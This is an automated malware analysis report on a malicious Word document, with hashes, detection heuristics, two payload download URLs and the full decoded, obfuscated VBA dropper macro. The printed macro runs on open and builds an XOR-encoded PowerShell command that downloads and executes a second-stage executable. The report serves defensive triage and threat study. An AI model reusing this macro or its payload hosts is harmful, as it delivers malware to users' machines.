Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 edb715f93c7e5ac2…

MALICIOUS

Office (OLE)

Size: 91.8 KB
Created: 2018-07-03 09:51:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: db9df58f1c37b97b9033ca76a739b640
SHA-1: b32babb09c49755023d50a5069b64c24e2bab9dc
SHA-256: edb715f93c7e5ac2ff2cb0f147e8e18dd74d11d67d2a5b89d7878df72eb02c5e
Risk Score: 350

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro uses CreateObject and WScript.Shell to execute commands, specifically a PowerShell command. This indicates the document is designed to download and execute a second-stage payload.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6599348-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6599348-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       DrKPGw = 47106 / uKBzC + 5696 - ojucw / NTOzf + jSbrC
    TZKLGchvGf = jrFPNQEG + CreateObject("Wscript.shell").Run(vMXNz + Chr(vbKeyP) + IbjGdICjF + Chr(vbKeyO) + OmvGcHQK + bcjDtmpLwSi, 541989828 - 541989828)
       PNAoi = 9622 / YHfdSX + 42434 - tCDRiZ / uJHCd + cWESZ
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       DrKPGw = 47106 / uKBzC + 5696 - ojucw / NTOzf + jSbrC
    TZKLGchvGf = jrFPNQEG + CreateObject("Wscript.shell").Run(vMXNz + Chr(vbKeyP) + IbjGdICjF + Chr(vbKeyO) + OmvGcHQK + bcjDtmpLwSi, 541989828 - 541989828)
       PNAoi = 9622 / YHfdSX + 42434 - tCDRiZ / uJHCd + cWESZ
  • Payload URL decoded from an encoded PowerShell loader (2 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "ubwNPjYdFY"
    Sub AutoOpen()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://boyramos.dags.us/license/wait.exe - Referenced by macro
    • http://blackcontext.ru/wait.exe - Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13091 bytes
SHA-256: 5ca69548c32b8b749d84ec546ab4ac75da43e4dec7b836803ec508491f1a2af4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
267 of 429 identifiers look randomly generated (e.g. 'SmvtrzDDMXHY') — consistent with name-mangling obfuscation.
First 1,000 lines of the extracted script
Attribute VB_Name = "pUiHXGEBpmEah"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ubwNPjYdFY"
Sub AutoOpen()
On Error Resume Next
   TcNzJ = GBhuCQ + iFZKYB + 80113 + 69067 - 70918 * vKhHu
   mhwYM = WczAzI + wDHjo + 84143 + 92188 - 82772 * noMLEQ
   hojub = EFCfm + rALris + 8263 + 72681 - 90017 * iKItMf
   CJKkqA = ilozF + CmTdG + 46750 + 37355 - 65106 * sqQNnG
   wBKjSi = BLUaA + IRIfaI + 33052 + 10890 - 24850 * IzqwS
   fYzVTY = FkMdA + VRBAcC + 27879 + 99929 - 63937 * wWLIt
   MAuGI = YlLzzw + wtofz + 727 + 64489 - 29984 * nDaji
   SmbrL = VtIKiw + nzYDtd + 73131 + 61357 - 12994 * iHNrKN
LiEFzTEwtU (FUKWbFUKjFn + bPzGdPS + tFmMoAKkBBO)
   GMnEot = kWjZX + HuFvL + 28358 + 85586 - 27619 * wObwj
   QCrAZ = nmKQz + wRsaBi + 97375 + 61615 - 46921 * SZNdWw
   wIQiV = LSUOqH + pIbOC + 46760 + 77943 - 77042 * kzcill
   hbjrA = LKVbX + pLMRK + 10161 + 45728 - 15069 * koZiMH
End Sub

Function FUKWbFUKjFn()
On Error Resume Next
CuECzc = (vzzJF - GrVVY - shqqMJ + Elczjt - 69367 + wTCis / tUSdD / iYwbkU)
   WSWKop = (QiNEE - SifTA - mVYzQ + awtKZk - 97005 + sMkXBa / jlwYLH / JnKLi)
   GhEWCD = 14686 - NnSjcV + 67567 * AlZfOo - XAjhwC + PBEOQ / ZiDtMO - GCblQM + 53409 / VqfiSn
   AMzUF = (NsdGFc - OMGzI - ZKDjc + FcDmG - 98990 + GlpjO / SbNBF / qwFtKC)
BcJiIjN = "wershell " + "      " + "    " + "    " + "    &" + Chr(40) + " $p" + "ShomE[21]" + Chr(43) + "$PS" + "hOMe[30]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40)
KkMkh = 31548 / dipRwA + CWliu / ruclY + Ymjjd - 72613 + nbNcaX / jKJauu
   YLqcN = 55075 / SQHaL + rzuuM / PNaotK + OfhkC - 81859 + AAbsHQ / WUKFC
   KIMEst = 97842 / jTAOQ + GJYTm / dwMXMI + QfmBP - 28534 + ZJkPJ / tiJBSP
   ZbOaHz = 77857 / Lvorj + itzRkz / wzZJJ + mwpKFw - 40983 + oQLtSa / NNvXa
zQfCb = " [stRin" + "g]::Joi" + "N" + Chr(40) + "''," + Chr(40) + " " + Chr(40) + " 22,91" + ", 12" + "3 , 10" + "2, 15 " + ",92,87" + " , 6" + "9 , 31 ," + "93, "
kEuUhN = 67158 / QrUPG + PThIw / JqHik + jCwEf - 12756 + MAPQzb / lTEPc
   UwtRB = 32802 / nStwQ + PdfXLL / buFAD + hdlpms - 1987 + zmJfC / qAuGS
   IojPO = 28137 / iEzXw + BOjlj / khPqY + nwWss - 30218 + rwDZvR / nbzvC
   vpOvq = 67997 / zRhszL + bStmM / nEVwok + KSJiU - 77498 + GzhbC / ljZOK
NldvEaVQ = "80, 88 " + ",87 , " + "81,70, " + "18 ,1" + "24 ," + "87, " + "70,28" + ", 101,87" + " ,80 "
JjuKzB = 8522 / oQCii + zIGwFd / MlYpsv + uWlSYt - 6185 + jfzuBV / DRwwKT
   TddTL = 94909 / VVEFLL + ikGok / ZaBLb + ciGst - 70970 + kCIoE / FjNJsp
   NLsFw = 86235 / Prart + SjmBc / EPRSq + sIwXa - 99704 + hCWVlj / tplbXu
   RkiDz = 34529 / OlwtB + EkFrQa / LLwNBV + MPdquv - 11916 + XTTahw / Racjw
PsYfhq = ",113 , 9" + "4,91 , " + "87 ,92" + ", 70 , " + "9 , 22" + ", 88 " + ", 95 ,1" + "02 , 1" + "5,21 ," + "90 , 70 ,"
EPZErf = BazrnT + kIUJKl + 99877 - iIckzz * OzaVz * avakJ * 98182 * juTaj + (59661 + asFSCb * jQbGh / 65496)
   QwhhUF = ABlpDw + YbTwH + 7466 - GpabK * aHpZp * sWNjaB * 60723 * LInNj + (25856 + chNaE * cKIHGK / 90198)
   tLMzc = oKrsv + nzzBNv + 93991 - zZczlz * MFcTq * IRwbND * 18483 * SpUfco + (59709 + GtLNA * TjNOd / 76252)
   JRYhqJ = 51559 / ksbSsC + QPcLU / aQWvBG + nLRIWk - 98229 + KZCjK / AJjWLf
PLrjcVcp = "70,66 " + ", 8, 29," + "29 ,80" + ", 93 ," + " 75 ," + " 64,8" + "3, 9" + "5, 93" + " , 65" + " , 2" + "8 ,86"
ZjnGQ = viwYQF + HdCrlm + 13505 - PVaKd * jFIIh * FrDLK * 85751 * jVNiiG + (64940 + oZEBK * zKONvm / 18451)
   uaVRzu = tsFpaW + rDjSC + 7971 - aMzWd * rLOBIi * lpvVq * 93787 * jKJdaU + (85705 + uNsOi * UOXvU / 14060)
   idEhwR = BHOcFR + PCUvIu + 47422 - BIuzi * bXaWp * zhEviD * 31560 * nzQIN + (53605 + LCzLM * Rcwnw / 67044)
   MARRUS = NtYBm + SopCES + 28449 - VuHTXG * iwdbQX * tBJLM * 47705 * zjQQn + (77368 + aZCPTA * GKzzLQ / 66776)
iENMN = ",83 , " + "85,65 ,28" + " ,71 ,6" + "5 ,29 " + ", 94, 91" + ",81,87," + " 92 , 65," + " 87 ,29 " + ",69, 83 ," + " 91,70, 2" + "8 ,87,7"
OfzXtK = aQwiG + zGYXKz + 28032 - jjjNr * lMQtI * NSESf * 50370 * srNRM + (16965 + QcoLH * aYhzQ / 18265)
   hktSn = Jzids + mzdwfz + 27756 - CZRcXO * uulDo * sTdpFV * 69502 * GdudHF + (16784 + BGMzBO * TQuZF / 29429)
   sZDIu = zGZciz + vXzQJK + 796 - iqrZdL * ZLwic * lUZzK * 55166 * ujkSCT + (23481 + RiQuOL * jMiRU / 78380)
   dpQjl = PZqhs + arCqr + 8416 - BsfDGX * IhozOF * RsXNzU * 17026 * OiXIJ + (2256 + HXVrr * XzmKL / 86667)
iJsBLiSI = "4 , 87" + ",114 ," + " 90 , 70" + ", 70,66 ," + "8, 2" + "9,29 " + ",80 " + ",94,83, " + "81 , 89 ," + "81 ,93, 9" + "2,70 , 87"
DQNRz = wDokr + JWJozM + 95681 - qkPJAN * wWMqJC * XjjKd * 36192 * wFsMf + (63752 + mpicN * aTADRk / 63563)
   VzvwCV = junEB + wDWjpm + 29092 - ajVUI * AiRoU * Andpff * 94987 * nJUKj + (19821 + TJczH * WuQab / 88395)
   KAdzk = iJajB + pDcQM + 20319 - wIhZoo * qisNP * lsAnj * 39665 * bbztcb + (81626 + ztdDP * vwdbpL / 45323)
   nSNzF = AlfBF + jzVRSO + 43456 - iHIYF * nfokFC * YOadO * 24430 * IakbiT + (44711 + EHPlt * XfJpt / 35828)
MnsGLCtzSiw = " , 7" + "4, 70" + ",28, " + "64,7" + "1,29" + " , 69" + ", 83" + " , 9" + "1,70 , 2"
HSDYiD = YRPKPi + IzRidz + 97247 - XwwJF * Uwciwm * chCoS * 59104 * acqwD + (52693 + znDmH * HvHaYw / 84089)
   CdDYTX = szzqUN + DRFVz + 76248 - jRiSq * TfUCzD * DDkEmY * 14027 * szEMZ + (77135 + cmJvC * WLVGc / 66076)
   NdzqQX = zhBiY + AnSdFR + 2028 - DisEA * hsOzJ * cJPBOv * 3197 * LulaW + (43213 + isrBL * XJvFlQ / 9162)
   jcuihz = aHmjiY + fXzUfS + 18978 - iNvZkE * ctslWQ * wdziZM * 64723 * tiFjnd + (12747 + FOqwuj * IPurfs / 81682)
wiLfLSrk = "8 ,87 ,74" + " ,87 , 2" + "1, 2" + "8,97," + "66, 94," + "91,70,26" + ", 21 " + ",114,21" + ", 27 , 9" + ", 22 , "
TkKXdd = FPjqK + kpiWT + 36309 - jMahKQ * QaIWa * FTKUIb * 6792 * IuvRtJ + (34110 + PfGhzD * KdNME / 7962)
   niqfiT = uYtuc + kOQAEO + 62577 - DwAtY * aXAWpW * kfkJOO * 88801 * zZZRt + (53316 + WdlfST * hpmJZf / 43109)
   XEGzA = fqpzmP + WbbfR + 52057 - WlKDX * zvXEpO * aCVLvb * 32225 * mvfjEj + (21123 + KiHEU * luCZA / 71045)
   UnfSr = jQPtLS + ZvFCFi + 95782 - IYspB * jZbPUn * FpLdM * 69283 * hYKbp + (94380 + ACYTTt * MOndpu / 98686)
XJjBKMA = "70, 116" + ",104,1" + "8 ,1" + "5, 18, 2" + "1, 7 ," + "11,1" + "0, 21,9" + " , 22"
wmGlTN = qGbGz + FObZsA + 84237 - CfzJO * QhRmaf * ijUJCN * 83674 * Hffts + (36292 + DJCoZO * HJcFOz / 17244)
   SSdQKu = wOBDGD + LAajW + 44223 - izIAC * JkfSA * mnzlBr * 70970 * jwvCr + (62652 + SzvQj * KnTUPH / 71055)
   MiiCJ = RMPZp + LkfDGJ + 42095 - qnkCUO * zjQmjz * XPNAhP * 95273 * hWavW + (50887 + POGlq * Ywfivp / 34024)
   HNPiFQ = JOrPwY + iQQHG + 39161 - dPthC * ArvOw * dniBPE * 1475 * FROSB + (60538 + jNwFzj * izWwD / 8776)
RlwCKUtnpkd = " , 9" + "3 ,99 , 8" + "8 , 1" + "5, 22 " + ", 87" + " , 92"
FUKWbFUKjFn = BcJiIjN + zQfCb + NldvEaVQ + PsYfhq + PLrjcVcp + iENMN + iJsBLiSI + MnsGLCtzSiw + wiLfLSrk + XJjBKMA + RlwCKUtnpkd
   ojRJXi = PpnAs + ARQVff + 57170 - jlFLm * LhzzrP * qzbiv * 11602 * tMBZWB + (12772 + LjiTff * uLwlC / 91484)
   hKiIB = 63649 / NfXksn * (44971 + YCZWf - DXPvJ / uwQSi) - XEtlbJ - Zzopj
   nZMwu = 46872 / SMinP * (24648 + IhOPEF - QSTma / AGGOh) - vWwhzW - HTKaGV
   soIcbJ = 34371 / mkZjPX * (69408 + pkVTVN - YknmE / kKDBK) - MRtaw - Wwwtw
End Function
Function bPzGdPS()
On Error Resume Next
RNsjY = 70089 / uWGtMT * (15131 + MFPFh - VJzOt / wmFsM) - LzmOX - zHAzro
   fsidH = 82086 / dzJWkr * (28277 + ZmjsoB - cQjUU / FCcfPl) - YooElw - OVdwUN
   ivpKVW = 33220 / SwnWB * (46181 + hrVGTG - wcHsGw / mjzHJ) - GmVuOd - VrQPu
   CmkHFK = 696 / zvEsUf * (49282 + HQOjwH - kwiZI / RWRLb) - YOfAhM - ODiVCK
mnsNvIVzbki = ",68, 8 " + ", 70, 87" + ",95 , " + "66 ," + " 25 ,21" + " ,110 ," + "21 ,25," + "22,70 ,1" + "16 , 104 "
RombO = 86888 / szMDdQ * (35314 + fMoOr - quVarq / PGMszj) - SzIkOh - JaSRwL
   ESZHl = 32562 / JJaYzs * (22896 + aMrdXj - PQTkY / SzzppG) - PuwXc - nPALr
   wMzVP = 71110 / WACInB * (85273 + qMdiKm - ijQTA / soPFb) - bSVbhE - jJMlI
   qfcAC = 50600 / uQAWCi * (57124 + AKfhlq - EDAJOh / DJtfz) - bjruI - XiHOL
cAwwwb = ",25," + " 21,28 ," + " 87, 74" + ", 87,2" + "1,9, 84" + " ,93 ," + " 64,87" + " , 83 , 8" + "1 ,90 " + ", 26"
kKzDX = 54866 / PuiRFw * (70069 + dLnDM - QcVkv / JCsRuH) - QIvlrc - TjkEVk
   QiWGi = 38351 / XkzTYY * (57470 + dEkpL - QnuQI / InHXl) - Hfwwt - XiqaK
   YVOHh = 76974 / kIOzq * (52968 + WvZkcc - JRwJjL / ScNpdl) - mKBFTK - FsfGU
   jGwZh = 92385 / ThbSb * (96375 + MCQWw - UMiZv / SzjrQO) - Kdwur - LswaT
hRBDj = ", 22 " + ",92, 1" + "22, 10" + "0 ,1" + "8, 91," + "92 , 18, " + "22 ," + " 88 ,9"
icJGw = 65081 / OEPzBc * (64409 + fAKNp - jkXfIR / DYSDLH) - pTGrvK - iuEEqd
   KOVsEN = 96058 / bznwB * (35288 + YbtjwA - IUmfiO / mOAws) - MvvvQ - ujhOBv
   fdDXm = 7536 / aGBGYj * (68408 + plmwJJ - cjwQQG / bFkkPi) - iqNuvi - upWhz
   arVsiG = 96947 / lbpQtK * (60720 + tpVkdM - SRfTBp / bRozd) - wKjBwz - fBfRTC
TurLOSGzf = "5 , " + "102 " + ", 27" + " , 73," + "70,64 " + ",75,73," + " 22,91, " + "123,102" + ", 28,118" + ",93,69"
uvbDm = 11859 / AXYVnq * (52588 + vVoTAw - uZDOb / ircjRz) - fihwJ - nLSsHE
   aifVfV = 11857 / Kkbhjr * (5204 + EtXUDN - EjJCP / JFUnF) - jinPH - LzjfBq
   TijXH = 15468 / NTblWT * (81999 + BfGtbb - JRiQt / NbYhSA) - YchNfa - NCBsn
   awTiN = 96652 / oABzX * (59789 + SjwlW - WzQnqK / Iuchw) - UGjXt - SkQic
fzjGt = ",92 " + ", 94" + " ,93 " + ", 83" + ", 86, 116" + ", 91, 9" + "4,87, 26 " + ",22,"
iwEZHP = 50232 / VPtqOn * (99922 + DDESuI - zsOAZ / GPlcJ) - PWzaC - wDNoXR
   ZJoOjK = 24851 / RzvTn * (55282 + QOzMwA - BGjKFk / vFlwNS) - QwdKjD - nMwJi
   aaSFkn = 92182 / hhVEc * (51728 + uJXZJ - zSUBN / YNuiAa) - KVmjL - WiiPH
   CVzzoV = 79898 / ZGhtO * (1237 + OzHNEb - VEdBsw / KJUwO) - nHSzH - qpQSh
IfviwjK = "92,122, " + "100, 30" + " ,18 ,22 " + ",93,99,88" + ", 27,9," + " 97 ,70,8"
bPzGdPS = mnsNvIVzbki + cAwwwb + hRBDj + TurLOSGzf + fzjGt + IfviwjK
   pjzkvQ = 74439 / pLikZP * (69134 + uJFmJQ - iZvrD / dhoVB) - QnqVm - SQJGkS
   HcjsC = 51533 / UUaIwE * (43928 + XunzUd - QAIdL / naRCM) - GVpUrH - FojMn
   jYuaGB = 35540 / OQLAY * (67110 + LitOX - TuDnSM / ALbocz) - ziGhU - wCWfVO
   NEfMVu = (Ndrmo + bYDpWX) + MFdXM + 90006 * 78331 - RXYSEU / (55994 + fOSiwJ)
End Function
Function tFmMoAKkBBO()
On Error Resume Next
PUOpVU = (OrcsM + YAJKI) + bHEJOc + 46648 * 78106 - iLYmi / (32537 + zVidI)
   rUtiH = (whIzpf + bIAbF) + wGSUj + 39226 * 97628 - XaEoaC / (68748 + DSQhTS)
   MMMhpU = (DJFYW + iLLANw) + SjjEGi + 96640 * 40828 - ofiob / (90474 + whmDaB)
   FzPni = (oURjdj + jHaHWt) + UZuiO + 75552 * 36984 - SatFR / (14015 + FruPdL)
Hcobkhv = "3 ,64 , 7" + "0, 31 " + ", 98, 64" + " ,93, 81," + " 87," + " 65, 65 " + ",18, 22,9" + "3, 9" + "9 , 88 " + ", 9," + " 80,64 "
ZMvLX = (DuzKW + EmRXK) + fpFlWS + 51341 * 33894 - CUJIE / (44010 + ApubA)
   OwKuO = (oGfhh + EfFjYv) + ZCqnY + 30080 * 47867 - CjMGP / (83008 + LwYUY)
   VKDYqm = (Fjnll + iBnpdl) + LAaqC + 33938 * 95170 - mbcili / (39034 + iwboGC)
   jXWPo = (MARqu + VjMWYo) + THLCz + 13446 * 27187 - ErBwz / (17850 + uSfCJY)
SbowNOi = ", 87,83," + "89 ,9,79," + " 81,83," + "70 , " + "81,9" + "0, 73, " + "79 , 79 " + Chr(41)
QwzPaV = (zHuiQ + SuwwV) + WbjjT + 72290 * 80618 - UJPwLN / (46691 + SwfBTP)
   bKrrw = (LVbDzj + LUUXIa) + HIQtu + 53817 * 78004 - urWfwt / (62322 + KIJPv)
   jcziaN = (MLoFZ + jRddk) + EnswXC + 88866 * 49348 - BRTrGf / (99766 + WDPRO)
   DJGoRM = (TBRcK + qjZfj) + dLtVNS + 53009 * 62802 - GaVZq / (82283 + mROdNa)
ajaNi = "| fOReA" + "cH{[" + "chAr] " + Chr(40) + " $" + "_-bxO" + "R  0x32 " + Chr(41) + " } " + Chr(41) + Chr(41) + " " + Chr(41) + "   "
tFmMoAKkBBO = Hcobkhv + SbowNOi + ajaNi
   CmwFF = (zZsnhm + pEKcF) + fpHfC + 64791 * 14437 - SszlIz / (8048 + KHPMX)
   QBOwXJ = (zXick + KnsVpf) + NawDUR + 3825 * 87205 - QDaDd / (55360 + zWEXo)
   iXQtQJ = (PptwQJ + vHuXz) + jhtCZm + 31356 * 34685 - CMtjlH / (68155 + IQwvC)
   Fmrqk = (CNrObN + iNTit) + VmhFh + 46657 * 22315 - slGzB / (57147 + nPivfp)
End Function


Attribute VB_Name = "SmvtrzDDMXHY"
Function LiEFzTEwtU(OmvGcHQK)
On Error Resume Next
   YuuoT = 385 / MwTdl + 76179 - WmnuRO / XtQtbY + havNR
   znWkJp = 1168 / TRHtt + 97586 - DFcmcb / Advsb + fXXQUD
   iQClcN = 41389 / cJAia + 79298 - UTboIw / spRONq + trYqXw
   iBZIwZ = 46079 / SSHDY + 64935 - ZdpKi / kkfjZ + qsXEq
   pRbQZC = 4182 / XuHMQ + 76938 - oCswvB / qXwPa + pBTSwG
   lcXGr = 50335 / ASMBjr + 30826 - QivHpb / EUKbOY + apNJb
   MilEU = 36518 / XLufj + 46273 - llWrRl / YDwPM + irWna
   DrKPGw = 47106 / uKBzC + 5696 - ojucw / NTOzf + jSbrC
TZKLGchvGf = jrFPNQEG + CreateObject("Wscript.shell").Run(vMXNz + Chr(vbKeyP) + IbjGdICjF + Chr(vbKeyO) + OmvGcHQK + bcjDtmpLwSi, 541989828 - 541989828)
   PNAoi = 9622 / YHfdSX + 42434 - tCDRiZ / uJHCd + cWESZ
   aQkAo = 33525 / RoIwWQ + 74642 - qdkqWu / Sqhbb + wkbKsA
   QJCOzm = 14367 / mLkmq + 72683 - tTbDcY / tTNpOV + jniQr
   Iilwr = 73931 / MCsZi + 84520 - dkpTWr / wnbpoI + kfoHF
End Function